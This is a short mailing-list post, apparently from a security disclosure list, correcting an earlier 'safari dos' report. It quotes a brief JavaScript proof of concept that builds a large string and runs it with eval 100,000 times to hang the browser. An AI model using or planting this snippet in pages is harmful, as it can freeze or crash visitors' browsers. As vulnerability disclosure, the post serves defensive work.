[<prev] [next>] [day] [month] [year] [list]
Message-ID: <A7F746377BDB7D4EA8E6623AF92F43C8132C1F@copper.bwsint.com>
From: grant.husbands at businesswebsoftware.com (Grant Husbands)
Subject: safari dos
I wrote:
> b='';a="b=b+' ';"
> for (var i=0;i<15;++i) a+=a;
> // Above line creates a 64MB script
> // Now run the 64MB script, 100,000 times
> for (var i=0;i<100000;++i) eval(a);
Just a quick note; I had altered the script without updating
the comments. It only creates a 256KB script, now; a longer
one didn't seem necessary. Sorry.
Regards,
Grant.
Powered by blists - more mailing lists